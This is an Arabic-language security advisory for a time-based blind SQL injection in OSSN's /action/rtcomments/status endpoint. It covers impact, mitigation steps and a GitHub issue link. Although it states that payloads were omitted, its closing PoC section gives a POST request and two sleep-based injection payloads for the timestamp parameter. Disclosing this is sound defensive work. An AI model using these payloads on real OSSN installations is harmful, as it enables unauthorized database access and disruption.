
إثبات المفهوم لثغرة حقن SQL أعمى قائمة على الوقت في نقطة نهاية /action/rtcomments/status في OSSN، مما يوضح تنفيذ SQL عشوائي عبر معلمة الطابع الزمني.
حقن SQL أعمى قائم على الوقت في /action/rtcomments/status (المعامل: timestamp)
تم العثور على ثغرة حقن SQL أعمى قائمة على الوقت في معامل timestamp لنقطة النهاية /action/rtcomments/status. قد يتمكن مهاجم مُصادَق يمكنه توفير هذا المعامل من تنفيذ استعلامات SQL تعسفية، مما قد يكشف أو يعدّل بيانات حساسة.
الأثر: كشف البيانات، تعديل البيانات، تصعيد الامتيازات، احتمال رفض الخدمة (DoS) عبر استعلامات التأخير الزمني (اعتمادًا على صلاحيات قاعدة البيانات).
التخفيف: قم بترقية OSSN إلى الإصدار 8.9 أو أحدث. بالإضافة إلى ذلك، تأكد من أن التطبيق يستخدم استعلامات مُعلمة/عبارات مُجهزة لجميع الوصول إلى قاعدة البيانات، وتحقق بدقة من مدخلات timestamp (اقبل التنسيقات الرقمية أو ISO المتوقعة فقط)، وفرض مبدأ أقل امتياز لحساب قاعدة البيانات، وفعّل مهلات الاستعلام وتسجيله.
ملاحظات: تم حذف حمولات الاستغلال عمدًا لأسباب تتعلق بالسلامة.
github: https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503
PoC
أرسل طلبًا باستخدام طريقة POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'
الحمولة: timestamp=(select*from(select(sleep(10)))a)

الحمولة: timestamp=(select*from(select(sleep(30)))a)
